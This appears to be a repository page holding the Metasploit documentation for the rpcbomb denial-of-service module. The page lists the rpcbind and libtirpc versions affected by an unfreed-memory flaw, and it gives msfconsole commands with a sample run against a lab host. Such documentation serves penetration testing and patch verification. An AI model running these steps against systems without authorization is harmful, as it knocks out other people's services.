metasploit-gs/documentation/modules/auxiliary/dos/rpc/rpcbomb.md at 94de45d856b7d4ea32456bbdc7531af67bfbcaa1

adam/metasploit-gs

Fork 0

Files

T

Pearce Barry bc3b883758 Add docs, fix typo, add missing report mixin to avoid error.

2017-06-05 13:49:59 -05:00

820 B

Raw Blame History

Vulnerable Application

This module exploits a vulnerability in rpcbind through 0.2.4, LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3.

Exploiting this vulnerability allows an attacker to trigger large (and never freed) memory allocations for XDR strings on the target.

Verification Steps

Start msfconsole
Do: use auxiliary/dos/rpc/rpcbomb
Do: set RHOSTS [IP]
Do: run
Target should leak memory

Scenarios

rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64)

msf > use auxiliary/dos/rpc/rpcbomb 
msf auxiliary(rpcbomb) > set RHOSTS 10.0.2.7
RHOSTS => 10.0.2.7
msf auxiliary(rpcbomb) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(rpcbomb) >

820 B Raw Blame History

Vulnerable Application

Verification Steps

Scenarios

rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64)

820 B

Raw Blame History